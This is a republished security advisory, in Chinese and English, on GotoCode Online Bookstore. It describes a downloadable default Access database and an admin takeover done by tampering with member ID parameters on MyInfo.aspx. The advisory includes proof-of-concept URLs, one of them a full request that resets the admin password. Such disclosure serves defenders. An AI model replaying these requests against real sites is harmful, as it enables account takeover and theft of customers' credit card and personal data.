网站地图    收藏   

主页 > 后端 > 网站安全 >

GotoCode Online Bookstore多个缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 标题: GotoCode Online Bookstore Multiple Vulnerabilities缺陷类别: Privilege Escalation / Remote Database Download作者: Nathaniel Carew www.2cto.com Email : njcarew@gmail.com级别: ......

 

标题: GotoCode Online Bookstore Multiple Vulnerabilities

缺陷类别: Privilege Escalation / Remote Database Download

作者: Nathaniel Carew www.2cto.com Email     : njcarew@gmail.com

级别: High

下载地址: http://www.gotocode.com/apps.asp?app_id=3&

平台: ASP.NET

测试平台: MS Windows Server Standard 2003 SP2 / IIS 6

 

概述

 

---------

Database:

If the application is configured using the default directory structure and an

access database then a user can download the access database.

 

Privilege Escalation:

By modifying the Form_member_id and p_Form_member_id variables to the ID of the admin

account (default ID is 7) on the MyInfo.aspx page in the POST data you can reset the admin

password with the password you entered into the appropriate feed to gain full admin rights to the web application.

 

 

Proof of Concept:

-----------------

http://www.2cto.com /[path]/BookStore_MSAccess.mdb

http://www.2cto.com /[path]/MyInfo.aspx?p_Form_member_id=7&Form_member_id=7&Form_member_password=moo&Form_name=Administrator&Form_last_name=Account&Form_email=admin%40www.2cto.com &Form_address=&Form_phone=&Form_notes=&Form_card_type_id=1&Form_card_number=111111111111

 

Impact:

-------

By resetting the admin password an attacker would be able to completely control the application, users

and their associated data such as stored credit card information. Successful database exploitation

would allow an attacker to download the complete database of users information including email addresses

usernames, passwords, credit cards and associated billing and ordering data.

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论